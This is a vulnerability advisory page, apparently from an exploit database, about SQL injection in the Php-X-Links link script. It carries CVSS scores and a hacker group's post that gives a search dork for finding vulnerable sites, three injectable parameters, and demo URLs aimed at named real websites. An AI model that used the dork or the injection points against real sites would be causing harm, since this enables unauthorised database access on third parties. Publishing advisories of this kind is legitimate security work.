PHP-X-Links SQL Injection

2012-01-03 / 2012-09-24
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

############################################################################ # Exploit Title: Php-X-Links Script SQL Injection Vulnerabilitiy # Google Dork: "Powered by Php-X-Links" # Date: 1/1/2012 # Author: H4ckCity Security Team # Discovered By: farbodmahini # Home: WwW.H4ckCity.Org # Version: All Version # Category:: webapps # Security Risk:: High # Tested on: GNU/Linux Ubuntu - Windows Server - win7 ############################################################################ # Exploit: # # # http://www.target.com/links/rate.php?id=[SQLi] # http://www.target.com/links/view.php?cid=[SQLi] # http://www.target.com/links/pop.php?t=[SQLi] # # # Demo: # # http://accessniagara.com/links/view.php?cid=17' # http://www.hibias.com/links/rate.php?id=1' # http://www.colink.it/pop.php?t=e' ############################################################################ # Special Thanks : Mehdi.H4ckcity-2MzRp-Mikili-M.Prince-Bl4ck.Viper-iC0d3R- # IrIsT-K0242-P0W3RFU7-Mr.M4st3r-Higher_Sense ,... ############################################################################ GreetZ : All H4ckCity Member - BHG Members ############################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top